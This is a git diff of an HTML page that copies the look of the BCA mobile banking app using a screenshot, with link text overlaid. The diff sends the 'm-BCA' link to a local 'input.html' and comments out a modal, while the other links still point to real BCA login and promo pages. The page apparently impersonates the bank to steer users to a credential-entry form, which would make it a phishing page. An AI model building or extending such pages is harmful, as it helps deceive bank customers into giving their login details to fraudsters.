--- a/index.html
+++ b/index.html
@@ -13,11 +13,11 @@
 <body>
   <img style="z-index: 0" src="https://res.cloudinary.com/codelifings/image/upload/v1613358205/Tak_berjudul41_mnu1wt.jpg" alt="bca mobile">
   <div style="position: absolute; z-index: 1; font-family: 'Roboto', sans-serif;">
-    <a style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px;" data-toggle="modal" data-target="#exampleModal">m-BCA</a>
+    <a style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px;" href="input.html">m-BCA</a>
     <a href="https://m.klikbca.com/login.jsp" style="position: absolute; top: -80px; left: -50px">KlikBCA</a>
     <a href="https://www.bca.co.id/promo?i=ddbccf03bb349e45f699f1a396a55b023a185b815ccfb33c1166015b462ffe85" style="position: absolute; width: 150px; left: -50px">Info BCA</a>
   </div>
-  <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
+  <!-- <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
   <div class="modal-dialog" role="document">
     <div class="modal-content">
       <div class="modal-header">
@@ -44,6 +44,6 @@
       </div>
     </div>
   </div>
-</div>
+</div> -->
 </body>
 </html>
